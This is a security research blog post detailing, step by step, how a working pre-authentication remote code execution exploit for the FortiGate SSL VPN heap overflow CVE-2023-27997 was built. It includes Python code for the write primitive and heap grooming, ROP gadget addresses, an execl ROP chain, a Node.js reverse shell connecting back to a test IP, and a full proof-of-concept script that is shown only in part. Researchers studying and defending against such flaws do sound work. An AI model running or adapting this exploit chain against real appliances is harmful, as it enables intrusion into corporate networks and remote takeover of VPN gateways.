Building an Exploit for FortiGate Vulnerability CVE-2023-27997

By: Bishop Fox Researchers, Security Researchers

Background

Earlier this year, Lexfo published details of a pre-authentication remote code injection vulnerability in the Fortinet SSL VPN. Shortly thereafter, we published a vulnerability scanner and an analysis of vulnerable systems on the internet along with a proof-of-concept demo. This blog post will describe how we built that proof-of-concept exploit, step by step.

Our exploit follows the steps described in Lexfo’s original writeup of the vulnerability. This writeup was extremely helpful when building our exploit, and it includes a lot more detail on the vulnerability.

Test Environment

Our debugging environment consisted of a FortiGate 7.2.4 virtual machine which we modified to disable some self-verification functionality. After bypassing these integrity checks, we were able to install an SSH server, BusyBox, and debugging tools such as GDB.

The Vulnerability

The bug is a heap-based buffer overflow, due to an incorrect size check when decoding a URL parameter in the /remote/hostcheck_validate and /remote/logincheck endpoints. These endpoints take a hex-encoded string in the enc GET parameter with the following format:

FIGURE 1 - enc parameter format (source)

The seed field is combined with a “salt” and the static string “GCC is the GNU Compiler Collection.” to form a key. The salt is derived from the time at which sslvpnd was started and can be obtained with a GET request to /remote/info. Encryption is performed with a custom stream cipher built from MD5. The following Python 3 code generates size bytes of keystream, which is then XORed with the plaintext data to generate the ciphertext:

from hashlib import md5
def gen_ks(salt, seed, size):
    magic=b'GCC is the GNU Compiler Collection.'
    k0=md5(salt+seed+magic).digest()
    keystream=k0
    while len(keystream)<size:
        k0=md5(k0).digest()
        keystream+=k0
    return keystream[:size]
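
As a quick sanity check of the cipher described above, the sketch below shows that XORing with the same keystream twice returns the original data, and that "decrypting" zero bytes yields the raw keystream. The salt value and the xor_bytes helper are illustrative assumptions, not taken from sslvpnd.

```python
from hashlib import md5

def gen_ks(salt, seed, size):
    # Same MD5-chained keystream construction as in the article
    magic = b'GCC is the GNU Compiler Collection.'
    k0 = md5(salt + seed + magic).digest()
    ks = k0
    while len(ks) < size:
        k0 = md5(k0).digest()
        ks += k0
    return ks[:size]

def xor_bytes(data, ks):
    # Hypothetical helper: XOR two byte strings of equal length
    return bytes(d ^ k for d, k in zip(data, ks))

salt = b'749a2b77'   # example value only; a real salt comes from /remote/info
seed = b'00bfbfbf'
plaintext = b'hello, sslvpnd'

ks = gen_ks(salt, seed, len(plaintext))
ciphertext = xor_bytes(plaintext, ks)

# Encryption and decryption are the same operation
roundtrip = xor_bytes(ciphertext, ks)
# XORing zero bytes with the keystream exposes the keystream itself
zeros_out = xor_bytes(b'\0' * 4, ks)
```

The second property is what makes the later write primitive possible: a byte that is known to be zero becomes a chosen keystream byte after one more "decryption".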

The application will call fsv_malloc to allocate a buffer of size strlen(enc_parameter) / 2 + 1, and hex-decode the data into this buffer. It will then decrypt the length field and attempt to perform a bounds check. Unfortunately, this check is implemented incorrectly, and the length field is compared to the previously computed length of the hex-encoded enc parameter rather than the length of the allocated buffer. As a result, we can “decrypt” memory out-of-bounds of the buffer.
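
The mismatch between the two lengths can be illustrated with some simple arithmetic. This is only a sketch: the function names are hypothetical, and the exact form of the comparison inside sslvpnd is an assumption based on the description above.

```python
def alloc_size(enc_hex_len):
    # Buffer size described in the text: strlen(enc) / 2 + 1
    return enc_hex_len // 2 + 1

def flawed_check(length_field, enc_hex_len):
    # Assumed shape of the buggy check: compares against the hex string length
    return length_field <= enc_hex_len

def intended_check(length_field, enc_hex_len):
    # Assumed shape of a correct check: compares against the decoded buffer size
    return length_field <= alloc_size(enc_hex_len)

# A hex string of 0x1fce characters decodes into a 0xfe8-byte buffer
enc_hex_len = 0x1fce
length_field = 0x1f00

passes_flawed = flawed_check(length_field, enc_hex_len)
passes_intended = intended_check(length_field, enc_hex_len)
bytes_past_buffer = length_field - alloc_size(enc_hex_len)
```

Under these assumptions, a length field of up to roughly twice the buffer size is accepted, which is why the "decryption" can run well past the end of the allocation.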

Heap Allocator

FortiOS uses jemalloc as its main allocator. Compared to the GNU libc malloc implementation, jemalloc is much more predictable and does not implement countermeasures against heap exploitation. As noted by Lexfo:

Allocations are contiguous, without any heap metadata between chunks
Freelists for chunks of a given size range are implemented with a LIFO mechanism, so we can reliably reclaim chunks

Like many other allocators, jemalloc uses different freelists for different chunk sizes. It can be helpful to keep these chunk sizes in mind when crafting allocations. The documentation includes a table of these size classes for 64-bit systems.

FIGURE 2 - Table of size classes and spacings for small chunks
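
To make the size-class table easier to apply, here is a minimal sketch that rounds a request up to its size class. It assumes the layout documented for 64-bit jemalloc (a 16-byte quantum up to 128 bytes, then four classes per power-of-two doubling); the size_class helper is hypothetical, and a particular build may use different parameters.

```python
def size_class(n):
    # Round a request of n bytes up to its (assumed) jemalloc size class
    if n <= 8:
        return 8
    if n <= 128:
        return (n + 15) // 16 * 16       # 16-byte spacing
    k = (n - 1).bit_length() - 1         # 2**k < n <= 2**(k+1)
    spacing = 1 << (k - 2)               # four classes per doubling
    return (n + spacing - 1) // spacing * spacing

# Sizes mentioned in this writeup
ssl_7_2_4 = size_class(0x1db8)   # SSL struct on 7.2.4
ssl_older = size_class(0x1850)   # SSL struct on older versions
just_over = size_class(0x2001)   # one byte more than 0x2000
```

With these assumptions, 0x1db8 rounds to 0x2000 and 0x1850 rounds to 0x1c00, which matches the regions discussed later in the post.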

Our First Crash

With the initial theory in mind, let’s see if we can cause a crash.

We first define some helper functions to generate the encrypted data given a salt, seed, size field, and data.

def gen_ks(salt, seed, size):
    magic=b'GCC is the GNU Compiler Collection.'
    k0=md5(salt+seed+magic).digest()
    ks=k0
    while len(ks)<size:
        k0=md5(k0).digest()
        ks+=k0
    return ks[:size]
 
def gen_enc_data(salt, seed, size, data):
    plaintext=struct.pack("<H", size) + data
    keystream = gen_ks(salt, seed, len(plaintext))
    ciphertext = bytes(x[0]^x[1] for x in zip(plaintext, keystream)).hex()
    return seed.decode()+ciphertext

Next, we grab the salt from the remote server:

r=requests.get(BASEURL+"/remote/info", verify=False)
salt=r.content.split(b"salt='")[1].split(b"'")[0]
print("salt: "+salt.decode())

Using this salt, we generate the enc parameter. To trigger a 0x1000-byte allocation, we send 0x1000-4-2-1 bytes of data, accounting for the size of the seed and length fields as well as the extra byte that gets added by sslvpnd for the null terminator. Then, we set the length field to just under 0x2000 to trigger the bug.

payload='enc='+gen_enc_data(salt, b'00bfbfbf', 0x1f00, b'A'*(0x1000-4-2-1))
try:
    r=requests.post(BASEURL+'/remote/hostcheck_validate', headers={'content-type':'application/x-www-form-urlencoded'}, verify=False, data=payload)
except requests.exceptions.ConnectionError: 
    print('Crashed!')

We run this and... nothing happens. We get an error reply from the server, but no crash. What gives?

As it turns out, the answer is simple: the fsv_malloc function which allocates the response buffer adds 0x18 bytes of header information before calling jemalloc to allocate the actual data buffer. Changing the size of the data field to 0x1000-0x18-7 and re-running reliably results in a crash:

$ python3 crash.py
Salt: 749a2b77
Crashed!
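
The size adjustment can be written out as a small calculation. This is a sketch based on the numbers given above (0x18 bytes of fsv_malloc header, 4 bytes of seed, 2 bytes of length field, 1 null terminator); the constant and function names are our own.

```python
FSV_HEADER = 0x18   # header added by fsv_malloc
SEED_BYTES = 4      # 8 hex characters of seed decode to 4 bytes
LENGTH_BYTES = 2    # encrypted length field
NULL_BYTE = 1       # terminator added by sslvpnd

def request_size(data_len):
    # Total size that ends up being requested from jemalloc
    return FSV_HEADER + SEED_BYTES + LENGTH_BYTES + data_len + NULL_BYTE

def data_len_for_chunk(chunk_size):
    # Data length that makes the request exactly fill chunk_size
    return chunk_size - FSV_HEADER - SEED_BYTES - LENGTH_BYTES - NULL_BYTE

naive = request_size(0x1000 - 4 - 2 - 1)    # first attempt
fixed = request_size(0x1000 - 0x18 - 7)     # after accounting for the header
```

The first attempt requests 0x1018 bytes, which lands in a larger size class than intended, while the corrected length requests exactly 0x1000 bytes.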

Out of Bounds Write Primitive

The next step is to turn our crash into an out-of-bounds write primitive. The technique described by Lexfo is very powerful, and we were able to reproduce it without any issues.

We start by brute forcing a seed value which results in a keystream containing the target byte at the correct offset.

def gen_seed_for_offset(salt, offset, value):
    for i in range(0xffffff):
        seed="00{0:06x}".format(i).encode()
        ks=gen_ks(salt, seed, offset+1)
        if int(ks[offset])==int(value):
            return seed    
    print("keystream search failed")
    return None

Next, we send two requests with the same seed. The first request will have a length field that causes sslvpnd to write the null terminator to the target byte. The second request will have a length field which is one byte larger, resulting in the target byte being “decrypted”. Since encryption uses XOR, and we have just set the target byte to 0, this results in writing a chosen value to the target offset. This will clobber the byte after the target value, but as you will see later, this isn’t an issue in practice. As an optimization, we can write a null byte by sending the same request twice, which means we can skip the brute force step.

def gen_seeds_u8(salt, offset, val):
    value=struct.pack("<B", val)
    if val==0:
        return [(b'00bfbfbf', offset-1), (b'00bfbfbf', offset-1)]
    s = gen_seed_for_offset(salt, offset, value[0])
    return [(s,offset-2),(s,offset-1)]
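
The two-request trick is easier to see on a toy model. The sketch below treats memory as a single bytearray and assumes each request XORs the first length bytes with the keystream and then writes a null terminator at index length. It ignores the seed and length header offsets, so the indices do not correspond to the real offsets used by the helpers above.

```python
def toy_decrypt(buf, ks, length):
    # Simplified model of one request: XOR `length` bytes, then null-terminate
    for i in range(length):
        buf[i] ^= ks[i]
    buf[length] = 0

buf = bytearray(b'ABCDEFGH')                         # stand-in for memory
ks = bytes([0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88])
target = 4

toy_decrypt(buf, ks, target)       # request 1: terminator zeroes buf[target]
toy_decrypt(buf, ks, target + 1)   # request 2: buf[target] becomes ks[target]
```

After both calls, the bytes before the target have been XORed twice and are back to their original values, the target byte equals the keystream byte at that position, and the following byte has been clobbered with a null.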

We know that we will want to write pointer values later, so we also make a helper function to generate seeds for pointers. For these values, we will start with the last byte of the 64-bit value and work backwards to avoid clobbering later data with the null byte that gets written by sslvpnd. Again, we can use the same optimization of skipping the brute force when writing null bytes. Additionally, on x86-64, the two most significant bytes of a user-mode address are null. This means we are never at risk of clobbering important data when we write a pointer to memory.

def gen_seeds_u64(salt, offset, val):
    value=struct.pack("<Q", val)
    seeds=[]
    n=7
    for i in range(n,-1,-1):
        if value[i]!=0:
            s=gen_seed_for_offset(salt, offset+i, value[i])
            seeds.append((s, offset+i-1))
            seeds.append((s, offset+i-2))
        else:
            # save some time by skipping the brute force. the application will write a null terminator to buf[size]
            seeds.append((b'00bfbfbf', offset+i-1))
            seeds.append((b'00bfbfbf', offset+i-1))
    return seeds[::-1]

Heap Grooming

Our goal is to overwrite a callback in an SSL struct. This means we will have to be able to reliably and repeatedly allocate our payload immediately before an SSL struct. Again, we follow Lexfo’s methodology of using a socket, which triggers allocations of a request buffer and an SSL structure in the same heap region, and then attempting to de-allocate the request buffer and allocate a new request buffer in its place. On our 64-bit system running version 7.2.4, the SSL struct has a size of 0x1db8 and is therefore allocated in the 0x2000 byte region. On older systems, we observed the SSL structure was 0x1850, and therefore allocated in the 0x1c00 region. Most of this writeup will assume a size of 0x2000.

To track down sources of allocations and deallocations, we made a GDB script that would print out useful debugging information while we made requests:

set height 0
set pagination off
set disassembly-flavor intel
handle SIGPIPE nostop
# break after allocating the buffer and grab the address
b *0x0173164e
commands
    silent
    set $heap_obj = $rax
    printf "buffer: %p\n", $heap_obj
    c
end
# print address of SSL objects when malloc'd
b *CRYPTO_zalloc+37 if  ( $r12 == 0x1db8 )
commands
    silent
    printf "CRYPTO_zalloc(0x%x) = %p\n", $r12, $rax
    c
end

# break in malloc helper function (used by vulnerable function)
b *0x018021d6 if (($r13>0x1c00) && ($r13<=0x2000))
commands
    silent
    set $size = $r13
    set $addr = $rax
    printf "malloc(0x%x) = %p\n", $size, $addr
    c
end

# break in je_malloc in case something calls je_malloc directly
b *je_malloc if (($rdi>0x1c00) && ($rdi <=0x2000))
commands
    silent
    printf "je_malloc(%x)\n", $rdi
    c
end

The exact addresses and registers that we use in this script were identified through static analysis and will need to be changed for each version you test. Using this script, we were able to minimize noise due to extraneous allocations, and reliably obtain the heap layout we want. This boils down to a few steps:

1. Create a requests.Session and issue a request to establish the TLS connection
2. Create a bunch of sockets to fill in holes on the heap
3. Send a very long message on one of the sockets, causing its data buffer to be freed and re-allocated elsewhere
4. Send multiple requests (using the Session established in step one) which each cause a 0x2000 byte allocation, and use them to overwrite the SSL struct

Step one is easy. We create a session with sess=requests.Session(), and replace our requests.get()/post() with sess.get()/post(). This will avoid repeatedly deallocating and reallocating the SSL object associated with our connection, resulting in much less noise on the heap.

Steps two and three are also easy:

import socket
import ssl
# Disable SSL verification
context = ssl.SSLContext()
context.verify_mode=ssl.CERT_NONE

ssocks=[]
# Create one SSL socket and save it in the global ssocks list
def create_ssl_conn():
    s=socket.create_connection(HOST, timeout=None)
    ss=context.wrap_socket(s)
    ssocks.append(ss)

for i in range(20): 
    create_ssl_conn()
# Pick one SSL socket and force its data buffer to be reallocated
ssocks[-2].send(b'A'*0x2001)

Step four is something we have already done: send requests to “decrypt” out-of-bounds data. We will use our helper functions from earlier to create a list of seeds and length fields. We then iterate through this list, sending one request per entry with the corresponding seed and length field and a data field of 0x2000-0x18-7 bytes, so that each request triggers a 0x2000-byte allocation.

One last note about the data field is that the plaintext must have a null byte before the first & or =. Otherwise, more allocations may occur. We work around this by simply starting our data with a few nulls.

RIP Control

Now that we have tamed the heap, we can work on the last few steps of achieving RCE. Right now, the hex-decoded data buffer is located 0x2000-0x18 bytes before the SSL structure. The first 4 bytes of this are the plaintext seed, followed by the encrypted size field and data payload. This means that when calculating offsets for our seed generation, the first byte of the SSL structure is at offset 0x2000-0x18-4. We know from Lexfo’s writeup that we will want to overwrite the handshake_func callback, which is at offset 0x30 within this structure. We also know from Orange Tsai’s writeup of CVE-2018-13383 that OpenSSL calls SSL_in_init before calling handshake_func. SSL_in_init checks the in_init field in our SSL structure, which will be false for established connections. Let’s overwrite these fields and see what happens.

In our exploit script, we add:

seeds=[]
seeds.extend(gen_seeds_u64(salt, handshake_func, 0x4141414141414141))
seeds.extend(gen_seeds_u8(salt, in_init, 1))
for i in seeds:
    print((i[0], hex(i[1]-ssl_offset)))
    make_req(sess, salt, i[0], i[1], b'\0'*8 + b'A'*(0x2000-0x18-7-8))

And when we observe the results in GDB, we see:

(gdb) c
Continuing.
CRYPTO_zalloc(0x1db8) = 0x7f6e3ead9000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb1e000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb2a000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb2e000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb3f000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb43000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb47000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb51000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb55000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb59000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb5d000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb61000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb16000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb6e000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb72000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb76000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb7a000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb84000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb88000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb8c000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb90000
CRYPTO_zalloc(0x1db8) = 0x7f6e3eb94000
CRYPTO_zalloc(0x1db8) = 0x7f6e3ebbc000
CRYPTO_zalloc(0x1db8) = 0x7f6e3ebc0000
CRYPTO_zalloc(0x1db8) = 0x7f6e3ebc4000
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
malloc(0x2000) = 0x7f6e3ebbe000
buffer: 0x7f6e3ebbe018
 
Program received signal SIGSEGV, Segmentation fault.
0x00007f6e43f2fe1b in ?? () from /usr/lib/x86_64-linux-gnu/libssl.so.3
(gdb) x/i $rip
=> 0x7f6e43f2fe1b:      call   QWORD PTR [rbp+0x30]
(gdb) x/gx $rbp+0x30
0x7f6e3ebc0030: 0x4141414141414141
(gdb)

As expected, the program crashes when trying to jump to 0x4141414141414141! Only a few more steps now.

Stack Pivot

The heap, where our data is located, is not mapped as executable. This means we won’t be able to send some shellcode and jump to it. We can easily make a ROP chain since the process doesn’t use ASLR, but since we don’t control data on the stack, the first gadget on the ROP chain will return to an address that we can’t control. This means we will have to find a way to point the stack pointer at something we can control. Looking at registers, we saw that both RDI and RBP point to the SSL structure that we can overwrite.

Using ropr, we find a push rdi; pop rsp; ret gadget at address 0xfd0582. Using this, we can place a second gadget at the start of the SSL structure and let it run. Unfortunately, the field after this is method, which is a pointer to a function table that we can’t safely overwrite without causing a crash. This means we must use another stack pivot gadget to adjust the stack pointer again. Since the stack pointer is already pointing close to our data, we attempt to find a gadget which would subtract a small value from RSP, causing it to point into our data buffer. Unfortunately, we can’t find a good gadget and settle for an add rsp, 0x270; pop rbx; pop r12; pop rbp; ret; gadget instead. That means, after the second stage of our ROP gadget, we are pointing the stack at SSL+0x290. Luckily, we finally have enough room to fit a longer ROP payload here.

In the last stage of our pivot gadget, RDI is still pointing at our SSL structure. We found a sub rdi, 0x100 gadget at 0x1afd214, and then follow this with the original push rdi; pop rsp; gadget to finally point our stack into the data buffer which we control. We could have alternatively used the write primitive to insert our entire ROP chain into the SSL structure, but that would require brute forcing more seeds and sending more requests, which would slow down the exploit significantly.

The three-stage pivot setup looks like this:

# set rsp = *SSL
PIVOT_1=0x00fd0582 # push rdi; pop rsp; ret
# rsp=*SSL+0x290
PIVOT_2=0x008ecb49 # add rsp, 0x270; pop rbx; pop r12; pop rbp; ret;
# rsp = *SSL-0x100
PIVOT_3=0x01afd214 # sub rdi, 0x100; test rax, rax; cmove rax, rdi; ret;
 
seeds=[]
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x30,  PIVOT_1))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x00,  PIVOT_2))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x290, PIVOT_3))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x298, PIVOT_1))
seeds.extend(gen_seeds_u8(salt, in_init, 1))

And running that results in:

(gdb) c
Continuing.
 
Program received signal SIGSEGV, Segmentation fault.
0x0000000000fd0584 in ?? ()
(gdb) i r rdi rsp
rdi            0x7f6e3ebbff00      0x7f6e3ebbff00
rsp            0x7f6e3ebbff00      0x7f6e3ebbff00
(gdb) x/8gx $rsp
0x7f6e3ebbff00: 0x4141414141414141      0x4141414141414141
0x7f6e3ebbff10: 0x4141414141414141      0x4141414141414141
0x7f6e3ebbff20: 0x4141414141414141      0x4141414141414141
0x7f6e3ebbff30: 0x4141414141414141      0x4141414141414141
(gdb) x/8gx $rsi+0x100
0x7f6e3ebc0000: 0x00000000008ecb49      0x00007f6e43f7f700
0x7f6e3ebc0010: 0x00007f6e3eacc660      0x00007f6e3eacc660
0x7f6e3ebc0020: 0x0000000000000000      0x0000000000000001
0x7f6e3ebc0030: 0x0000000000fd0582      0x0000000000000000
(gdb)

As expected, our stack points to 0x100 bytes from the end of our data buffer, or 0x100 bytes before the start of the SSL structure. This gives us plenty of room to fit a ROP chain in our buffer.

ROP Chain

Although it would be nice to simply call system('<commands>'), FortiOS uses a custom binary for /bin/sh which restricts what commands you can run. As a result, trying to run anything useful using system() or popen() will fail. Instead of using one of these convenient wrappers, we will construct a slightly less convenient ROP chain which calls execl. As a proof-of-concept, we will run execl('/bin/node', '/bin/node', '-e', '<node payload>', NULL).

The actual Node payload will be a slightly modified version of the NodeJS reverse shell we found in the PayloadsAllTheThings GitHub repository. Specifically, instead of running /bin/sh, we run /bin/node and pass in the -i argument for an interactive prompt. We also modify the connect-back IP to suit our test environment.

shell=b"""(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/node", ["-i"]);
    var client = new net.Socket();
    client.connect(4242, "192.168.250.110", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
"""

Since we have plenty of space for our ROP chain, we don’t try to optimize it too much. The simplified, pseudo-assembly version of our ROP chain is below.

mov rax, rdi ; rax = SSL-0x100
mov rcx, ~(0x1000-1)
and rax, rcx
mov rcx, rax ; rcx = SSL-0x1000
 
mov [scratch_buffer+0], "/bin/nod"
mov [scratch_buffer+8], "e\0-e\0\0\0\0"
 
mov rdi, &scratch_buffer    ; "/bin/node"
mov rsi, &scratch_buffer    ; "/bin/node"
mov rdx, &scratch_buffer+10 ; "-e\0"
mov r8, 0                   ; NULL
 
jmp execl ; execl("/bin/node", "/bin/node", "-e", payload, NULL);

Because of how jemalloc allocates memory, we know that our allocated buffer will be aligned to 0x2000 bytes. We also know that rdi is a pointer to our ROP chain, since that’s the register we used to pivot the stack onto our ROP chain in the first place. By masking out the low 12 bits, we point rcx into the middle of our buffer, which gives us plenty of room to add NodeJS code to do whatever we want. As for the other arguments, we decide to pick a fixed address that is readable and writable to use as a scratch buffer. We can then use a simple group of gadgets to write /bin/node\0-e\0\0\0\0 to that buffer. From there, we pop hardcoded values into rdi, rsi, rdx, and r8. Once that’s done, we jump to execl and our payload runs.

def pad(d, n, c=b'\0'):
    return d+c*(n-len(d))
def u64(x):
    return struct.pack("<Q", x)
def make_ropchain():
    scratch=b'/bin/node\0-e\0\0\0\0'
    scratch_vals=struct.unpack("<2Q", scratch)
    scratch_addr=0x04825000
    argv_1=scratch_addr+scratch.index(b"-e\0")
 
    rop =b''
    # 1. point rcx to offset 0x1000 within our data buffer, where we have our JS payload
    rop+=u64(0x02b228a0)       # mov rax, rdi; ret;
    rop+=u64(0x00b15381)       # pop rcx; ret
    rop+=u64(0xfffffffffffff000)
    rop+=u64(0x02c85e40)       # and rax, rcx; ret;
    rop+=u64(0x00b15381)       # pop rcx; ret
    rop+=u64(0)                # <rcx = 0>
    rop+=u64(0x02166fa9)       # or rcx, rax; ...; ret;
 
    # 2. write "/bin/node\0-e\0" to a scratch buffer
    rop+=u64(0x02c87265)       # pop rax; ret;
    rop+=u64(scratch_vals[0])  # "/bin/nod"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr)     # <scratch buffer>
    rop+=u64(0x029e36dd)       # mov [rsi], rax; ret
 
    rop+=u64(0x02c87265)       # pop rax; ret;
    rop+=u64(scratch_vals[1])  # "e\0-e\0\0\0\0"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr+8)   # <scratch buffer>
    rop+=u64(0x029e36dd)       # mov [rsi], rax; ret
 
    # setup arguments for execl
    rop+=u64(0x02ca0763)       # pop rdi; ret;
    rop+=u64(scratch_addr)     # "/bin/node"
    rop+=u64(0x02ca1f52)       # pop rsi; ret;
    rop+=u64(scratch_addr)     # "/bin/node"
    rop+=u64(0x02b76f39)       # pop rdx
    rop+=u64(argv_1)           # "-e"
    rop+=u64(0x0289a815)       # REX.WRXB pop r8
    rop+=u64(0)
    # rcx already points to the last argument
 
    # 3. call execl("/bin/node", "/bin/node", "-e", "<command>", NULL);
    rop+=u64(0x0043b170)       # execl@PLT
    # pad to size
    assert len(rop) < 0x100
    return rop
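
The address arithmetic in step 1 of the chain and the packing of the scratch string can be checked offline. The sketch below uses the SSL structure address from the GDB session shown earlier; the variable names are ours, and the address will differ on every run of a real target.

```python
import struct

ssl_addr = 0x7f6e3ebc0000          # SSL struct address from the GDB output above
rdi = ssl_addr - 0x100             # value of rdi after the third pivot
mask = 0xfffffffffffff000          # ~(0x1000 - 1) as a 64-bit value

# Clearing the low 12 bits lands 0x1000 bytes before the SSL struct
rcx = rdi & mask

# The 16-byte scratch string is written as two little-endian qwords
scratch = b'/bin/node\0-e\0\0\0\0'
first_qword, second_qword = struct.unpack("<2Q", scratch)
argv_1_offset = scratch.index(b"-e\0")
```

Since the chunk holding our data starts 0x2000 bytes before the SSL structure, the masked pointer refers to offset 0x1000 within that chunk, and the "-e" argument sits 10 bytes into the scratch buffer.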

We construct the data buffer to place our JS payload at 0x1000 within the chunk, and the ROP chain at 0x1f00 within the chunk.

payload_size=0x2000-0x18-7
payload =(b'\0'*8) + (b'A'*(0x1000-0x18-8-6))
payload+=pad(shell, 0x1000-0x100)
payload+=make_ropchain()
payload =pad(payload, payload_size)
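
The layout arithmetic can be verified without a target by substituting placeholder bytes for the real JS payload and ROP chain. This is a sketch: the stand-in contents and the constant names are assumptions, while the sizes come from the text above.

```python
FSV_HEADER = 0x18   # fsv_malloc header at the start of the chunk
SEED_BYTES = 4      # decoded seed
LENGTH_BYTES = 2    # encrypted length field

def pad(d, n, c=b'\0'):
    return d + c * (n - len(d))

shell_stub = b'S' * 0x200   # placeholder for the JS payload
rop_stub = b'R' * 0x80      # placeholder for the ROP chain

payload_size = 0x2000 - 0x18 - 7
payload = (b'\0' * 8) + (b'A' * (0x1000 - 0x18 - 8 - 6))
payload += pad(shell_stub, 0x1000 - 0x100)
payload += rop_stub
payload = pad(payload, payload_size)

# Everything that precedes the data field inside the chunk
prefix = FSV_HEADER + SEED_BYTES + LENGTH_BYTES
shell_chunk_offset = prefix + payload.index(b'S')
rop_chunk_offset = prefix + payload.index(b'R')
total_with_null = prefix + len(payload) + 1
```

With these sizes the placeholder payload starts at chunk offset 0x1000, the placeholder chain at 0x1f00, and the whole request fills the 0x2000-byte chunk exactly.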

And modify our code to send this payload instead of the A’s we were sending before:

for i in seeds:
    make_req(sess, salt, i[0], i[1], payload)

Finally, it’s time to start a netcat listener and catch a shell:

FIGURE 3 - Running the exploit and seeing our Node reverse shell

Full Proof of Concept

import requests, struct, ssl, socket
from hashlib import md5
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

context = ssl.SSLContext()
context.verify_mode=ssl.CERT_NONE
context.options|=ssl.OP_NO_TLSv1_3

HOST=("192.168.250.124",12443)
BASEURL="https://{}:{}".format(*HOST)

ssocks=[]
def create_ssl_conn():
    s=socket.create_connection(HOST, timeout=None)
    ss=context.wrap_socket(s)
    ssocks.append(ss)

def gen_ks(salt, seed, size):
    magic=b'GCC is the GNU Compiler Collection.'
    k0=md5(salt+seed+magic).digest()
    ks=k0
    while len(ks)<size:
        k0=md5(k0).digest()
        ks+=k0
    return ks[:size]

def gen_enc_data(salt, seed, size, data):
    plaintext=struct.pack("<H", size) + data
    keystream = gen_ks(salt, seed, len(plaintext))
    ciphertext = bytes(x[0]^x[1] for x in zip(plaintext, keystream)).hex()
    return seed.decode()+ciphertext

def make_req(sess, salt, seed, reqsize, data=b''):
    payload=gen_enc_data(salt, seed, reqsize, data)
    payload="enc="+payload
    r=sess.post(BASEURL+"/remote/hostcheck_validate", headers={"content-type":"application/x-www-form-urlencoded"}, verify=False, data=payload)
    return r

def gen_seed_for_offset(salt, offset, value, incl_ks=False):
    for i in range(0xffffff):
        seed="00{0:06x}".format(i).encode()
        ks=gen_ks(salt, seed, offset+1)
        if int(ks[offset])==int(value):
            if incl_ks: return seed, ks[:offset+1]
            else: return seed
    else:
        print("keystream search failed")
        return

def gen_seeds_u8(salt, offset, val):
    value=struct.pack("<B", val)
    if val==0:
        return [(b'00bfbfbf', offset-1), (b'00bfbfbf', offset-1)]
    s = gen_seed_for_offset(salt, offset, value[0])
    return [(s,offset-2),(s,offset-1)]

def gen_seeds_u64(salt, offset, val):
    value=struct.pack("<Q", val)
    seeds=[]
    n=7
    for i in range(n,-1,-1):
        if value[i]!=0:
            s=gen_seed_for_offset(salt, offset+i, value[i])
            seeds.append((s, offset+i-1))
            seeds.append((s, offset+i-2))
        else:
            seeds.append((b'00bfbfbf', offset+i-1))
            seeds.append((b'00bfbfbf', offset+i-1))
    return seeds[::-1]


def pad(d, n, c=b'\0'):
    return d+c*(n-len(d))
def u64(x):
    return struct.pack("<Q", x)
def make_ropchain():
    scratch=b'/bin/node\0-e\0\0\0\0'
    scratch_vals=struct.unpack("<2Q", scratch)
    scratch_addr=0x04825000
    argv_1=scratch_addr+scratch.index(b"-e\0")

    rop =b''
    # 1. point rcx to offset 0x1000 within our data buffer, where we have our JS payload
    rop+=u64(0x02b228a0)       # mov rax, rdi; ret;
    rop+=u64(0x00b15381)       # pop rcx; ret
    rop+=u64(0xfffffffffffff000)
